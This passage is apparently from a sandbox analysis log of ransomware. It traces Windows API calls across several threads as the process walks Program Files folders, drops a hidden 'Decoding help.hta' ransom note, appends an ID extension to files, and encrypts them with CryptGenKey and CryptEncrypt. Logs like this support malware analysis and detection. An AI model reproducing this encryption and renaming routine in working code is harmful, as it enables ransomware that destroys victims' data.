lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\4.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\4.png" [0061.315] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\4.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\4.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\4.png" [0061.315] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\4.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\4.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\4.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.315] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\4.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\4.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\4.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\4.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.315] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc32cf7d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc32cf7d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7ca65c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1874, dwReserved0=0x0, dwReserved1=0x0, cFileName="40.png", cAlternateFileName="")) returned 1 [0061.315] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0061.315] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0061.315] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" [0061.315] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\decoding help.hta")) returned 0x1 [0061.315] lstrcmpiW (lpString1="Decoding help.hta", lpString2="40.png") returned 1 [0061.316] lstrlenW (lpString="40.png") returned 6 [0061.316] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0061.316] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 76 [0061.316] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="40.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\40.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\40.png" [0061.316] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\40.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\40.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\40.png" [0061.316] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\40.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\40.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\40.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.316] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\40.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\40.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\40.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\40.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.987] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0x2569fd30 | out: lpFindFileData=0x2569fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc32cf7d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbc32cf7d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xbd7ca65c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xfe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="41.png", cAlternateFileName="")) returned 1 Thread: id = 817 os_tid = 0x5a4 [0054.551] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\*.*", lpFindFileData=0x257dfd30 | out: lpFindFileData=0x257dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10a4b5e8 [0061.344] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.345] FindNextFileW (in: hFindFile=0x10a4b5e8, lpFindFileData=0x257dfd30 | out: lpFindFileData=0x257dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.345] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0061.345] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.345] FindNextFileW (in: hFindFile=0x10a4b5e8, lpFindFileData=0x257dfd30 | out: lpFindFileData=0x257dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a71ef90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xa2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0061.345] lstrcpyW (in: lpString1=0x11334308, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\*.*" [0061.345] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\*.*") returned 70 [0061.345] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\Decoding help.hta" [0061.345] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\decoding help.hta")) returned 0xffffffff [0061.345] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ripple\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe6c [0061.687] WriteFile (in: hFile=0xe6c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x257dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x257dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.688] CloseHandle (hObject=0xe6c) returned 1 [0061.688] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 818 os_tid = 0x63c [0054.551] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\*.*", lpFindFileData=0x2591fd30 | out: lpFindFileData=0x2591fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da8b8 [0056.842] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.842] FindNextFileW (in: hFindFile=0x5da8b8, lpFindFileData=0x2591fd30 | out: lpFindFileData=0x2591fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.842] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.842] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.842] FindNextFileW (in: hFindFile=0x5da8b8, lpFindFileData=0x2591fd30 | out: lpFindFileData=0x2591fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0056.842] lstrcpyW (in: lpString1=0x97923d0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\*.*" [0056.842] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\*.*") returned 63 [0056.842] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\Decoding help.hta" [0056.842] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sv_se\\decoding help.hta")) returned 0xffffffff [0056.843] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sv_se\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xae8 [0058.321] WriteFile (in: hFile=0xae8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2591fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2591fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.322] CloseHandle (hObject=0xae8) returned 1 [0058.322] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.322] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0058.322] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0058.322] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\*.*" [0058.322] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\*.*") returned 63 [0058.322] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\Reader_10.0.helpcfg" [0058.323] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\Reader_10.0.helpcfg" [0058.323] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.323] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sv_se\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sv_se\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.323] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\sv_SE\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\sv_se\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xae8 [0058.323] CreateFileMappingA (hFile=0xae8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xaec [0058.323] CryptAcquireContextA (in: phProv=0x2591fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2591fcec*=0x2aac53c8) returned 1 [0060.199] CryptGenKey (in: hProv=0x2aac53c8, Algid=0x6610, dwFlags=0x1, phKey=0x2591fce8 | out: phKey=0x2591fce8*=0x671530) returned 1 [0060.199] CryptExportKey (in: hKey=0x671530, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2591fbe4, pdwDataLen=0x2591fce4 | out: pbData=0x2591fbe4*, pdwDataLen=0x2591fce4*=0x2c) returned 1 [0060.199] MapViewOfFile (hFileMappingObject=0xaec, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x39c0000 [0064.157] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2591fbe4*, pdwDataLen=0x2591fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x2591fbe4*, pdwDataLen=0x2591fcf8*=0x100) returned 1 [0064.158] CryptEncrypt (in: hKey=0x671530, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39c0000*, pdwDataLen=0x2591fce4*=0x140, dwBufLen=0x140 | out: pbData=0x39c0000*, pdwDataLen=0x2591fce4*=0x140) returned 1 [0064.158] UnmapViewOfFile (lpBaseAddress=0x39c0000) returned 1 [0064.160] CloseHandle (hObject=0xaec) returned 1 [0064.160] CryptDestroyKey (hKey=0x671530) returned 1 [0064.160] CryptReleaseContext (hProv=0x2aac53c8, dwFlags=0x0) returned 1 [0064.160] SetFilePointerEx (in: hFile=0xae8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0064.160] WriteFile (hFile=0xae8, lpBuffer=0x2591fbe4, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2591fcf8, lpOverlapped=0x0) Thread: id = 819 os_tid = 0x84c [0054.552] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyBoy\\*.*", lpFindFileData=0x25a5fd30 | out: lpFindFileData=0x25a5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f9e8c42, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7d4443, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9fbd8be5, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fba318 [0062.532] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.532] FindNextFileW (in: hFindFile=0x10fba318, lpFindFileData=0x25a5fd30 | out: lpFindFileData=0x25a5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f9e8c42, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa7d4443, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9fbd8be5, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.532] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.532] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.532] FindNextFileW (in: hFindFile=0x10fba318, lpFindFileData=0x25a5fd30 | out: lpFindFileData=0x25a5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70cace83, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70cace83, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cc5f99, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x303d, dwReserved0=0x0, dwReserved1=0x0, cFileName="babyblue.png", cAlternateFileName="")) returned 1 Thread: id = 820 os_tid = 0x848 [0054.552] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\*.*", lpFindFileData=0x25b9fd30 | out: lpFindFileData=0x25b9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10a4b628 [0061.346] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.346] FindNextFileW (in: hFindFile=0x10a4b628, lpFindFileData=0x25b9fd30 | out: lpFindFileData=0x25b9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.347] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0061.347] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.347] FindNextFileW (in: hFindFile=0x10a4b628, lpFindFileData=0x25b9fd30 | out: lpFindFileData=0x25b9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a71ef90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1004, dwReserved0=0x0, dwReserved1=0x0, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0061.347] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\*.*" [0061.347] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\*.*") returned 71 [0061.347] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\Decoding help.hta" [0061.347] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\decoding help.hta")) returned 0xffffffff [0061.347] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\rmnsque\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe6c [0061.689] WriteFile (in: hFile=0xe6c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x25b9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x25b9fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.689] CloseHandle (hObject=0xe6c) returned 1 [0061.690] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 821 os_tid = 0x834 [0054.552] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\tr_TR\\*.*", lpFindFileData=0x25cdfd30 | out: lpFindFileData=0x25cdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da738 [0056.841] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.841] FindNextFileW (in: hFindFile=0x5da738, lpFindFileData=0x25cdfd30 | out: lpFindFileData=0x25cdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5cc7c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.841] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.841] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.841] FindNextFileW (in: hFindFile=0x5da738, lpFindFileData=0x25cdfd30 | out: 